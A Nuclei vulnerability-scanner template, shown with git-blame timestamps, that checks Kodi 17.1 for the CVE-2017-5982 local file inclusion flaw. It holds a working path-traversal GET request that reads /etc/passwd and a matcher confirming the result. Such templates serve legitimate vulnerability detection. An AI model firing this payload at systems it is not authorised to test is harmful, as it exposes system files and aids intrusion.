nuclei-templates/http/cves/2017/CVE-2017-5982.yaml

43 lines
1.1 KiB
YAML
Raw Normal View History

2021-11-04 22:49:01 +00:00
id: CVE-2017-5982
2021-11-04 22:49:01 +00:00
info:
name: Kodi 17.1 - Local File Inclusion
2021-11-04 22:49:01 +00:00
author: 0x_Akoko
severity: high
2022-06-20 16:05:48 +00:00
description: |
Kodi 17.1 is vulnerable to local file inclusion vulnerabilities because of insufficient validation of user input.
2023-09-06 13:22:34 +00:00
remediation: |
Upgrade Kodi to a version that is not affected by the CVE-2017-5982 vulnerability.
2021-11-04 22:49:01 +00:00
reference:
- https://cxsecurity.com/issue/WLB-2017020164
- https://www.exploit-db.com/exploits/41312/
- https://nvd.nist.gov/vuln/detail/CVE-2017-5982
2021-11-04 22:49:01 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-5982
2023-07-11 19:49:27 +00:00
cwe-id: CWE-22
epss-score: 0.0488
2023-08-31 11:46:18 +00:00
epss-percentile: 0.91748
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:kodi:kodi:17.1:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: kodi
product: kodi
tags: cve2017,kodi,lfi,edb,cve
2021-11-04 22:49:01 +00:00
http:
2021-11-04 22:49:01 +00:00
- method: GET
path:
- "{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200